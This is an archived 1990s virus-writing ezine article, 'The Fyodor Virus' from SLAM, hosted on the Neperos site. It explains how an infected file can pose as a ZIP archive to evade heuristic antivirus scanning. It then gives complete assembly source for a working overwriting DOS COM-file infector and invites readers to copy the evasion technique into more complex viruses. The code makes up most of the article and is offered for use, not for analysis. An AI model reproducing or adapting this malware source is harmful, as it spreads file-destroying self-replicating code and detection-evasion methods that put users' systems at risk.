Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

SLAM2.024: A Funky New Anti-Heuristic Method - The Fyodor Virus

eZine's profile picture
eZine lover (@eZine)
Published in 
Slam
 · 2 years ago

The Fyodor Virus
by Gothmog/DHA

This virus uses an interesting anti-heuristic technique - infected files masquerade as .ZIP format files. To do this, the virus starts with a dummy 22-byte ZIP file header, which disassembles to do-nothing instructions which fortunately do not crash the processor: 

[cs]:0100 50            PUSH    AX 
[cs]:0101 4B            DEC     BX 
[cs]:0102 050600        ADD     AX,0006 
[cs]:0105 0000          ADD     [BX+SI],AL 
[cs]:0107 0000          ADD     [BX+SI],AL 
[cs]:0109 0000          ADD     [BX+SI],AL 
[cs]:010B 0000          ADD     [BX+SI],AL 
[cs]:010D 0000          ADD     [BX+SI],AL 
[cs]:010F 0000          ADD     [BX+SI],AL 
[cs]:0111 0000          ADD     [BX+SI],AL 
[cs]:0113 90            NOP 
[cs]:0114 0000          ADD     [BX+SI],AL


To a ZIP processor, the virus is stored as a ZIP comment, and the actual archive contains no files. In any case, this technique renders the virus invisible to TBAV, which flags only the `p' flag, for a packed file...

While this virus is nothing more than a featureless overwriter (I was testing the idea, so wrote it up _real_ quick...) the technique can easily be added to more complex viruses - just cut and paste! 

==========================================================[ code begins ]== 

.model tiny 
.code 

        org     100h 

virusStart: 

        db      50h, 4Bh, 05h, 06h, 00h, 00h, 00h, 00h, 00h, 00h, 00h 
        db      00h, 00h, 00h, 00h, 00h, 00h, 00h, 00h, 90h, 00h, 00h 

 
findFirst: 

filemask        db      '*.com', 00h, 00h 

        mov     byte ptr virusstart + 1, 'K' 
        mov     ah, 4Eh 

findFile: 
        xor     cx, cx 
        mov     dx, offset filemask 
        int     21h 
        jc      writeMsg 

openFile: 
        mov     ax, 3D00h 
        mov     dx, 9Eh 
        int     21h 
        xchg    bx, ax 

readFile: 
        mov     ah,3fh 
        mov     cx, 2 
        mov     dx, offset buffer 
        int     21h 

closeFile: 
        mov     ah,3eh 
        int     21h 

checkInfected: 
        cmp     word ptr[buffer], 'KP' 
        jnz     OpenFileAgain 
        mov     ah,4fh 
        jmp     findFile 

Virus_Name      db      'fyodor' 

openFileAgain: 
        mov     ax,3d02h 
        mov     dx,9eh 
        int     21h 
        xchg    bx,ax 

infectFile: 
        mov     ah, 40h 
        mov     cx, offset virusEnd - offset virusStart 
        mov     dx, offset virusStart 
        int     21h 

closeFileAgain: 
        mov     ah,3eh 
        int     21h 

writeMsg: 
        mov     dx, offset msgerror 
        mov     ah,09h 
        int     21h 

exit: 
        int     20h 

msgerror        db      'Bad command or file name', 13, 10, '$' 

virusEnd: 

buffer          dw      ? 

        end     virusStart 

; ============================================================[ code ends ]==

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

eZine's profile picture
eZine lover (@eZine)
22 Nov 2024
Thanks for the comment. I'm glad to know that my archiving work is useful to someone! You can find more ezines by checking out my profi ...
guest's profile picture
@guest
21 Nov 2024
I can't believe you archived it! Chronicles of Chaos was my favorite online magazine back in the day.
lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
21 Nov 2024
Thank you very much for your comment. I haven’t read the book by Hakan Öniz and didn’t know the Shardana could have traveled so far as to re ...
guest's profile picture
@guest
20 Nov 2024
Shardana or Sheridan are the sea peoples who arrive in Eire or Ireland and also move into Scotland
Adelaide's profile picture
@Adelaide
20 Nov 2024
È buono
guest's profile picture
@guest
20 Nov 2024
TODAY IT-S FREEZING. UNFORTUNATELY I NEED TO GO TO THE OFFICE! WHAT ABOUT YOU?
guest's profile picture
@guest
19 Nov 2024
reading Birmingham I thought that it was the city in UK :D
guest's profile picture
@guest
19 Nov 2024
are they made all year or typical of a special occasion?
guest's profile picture
@guest
19 Nov 2024
Deliziosa!!!!!Assolutamente da provare questa domenica! Grazie per l'idea :D
guest's profile picture
@guest
19 Nov 2024
deve essere molto dolce, zucchero piu' lo zuccherino della frutta
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT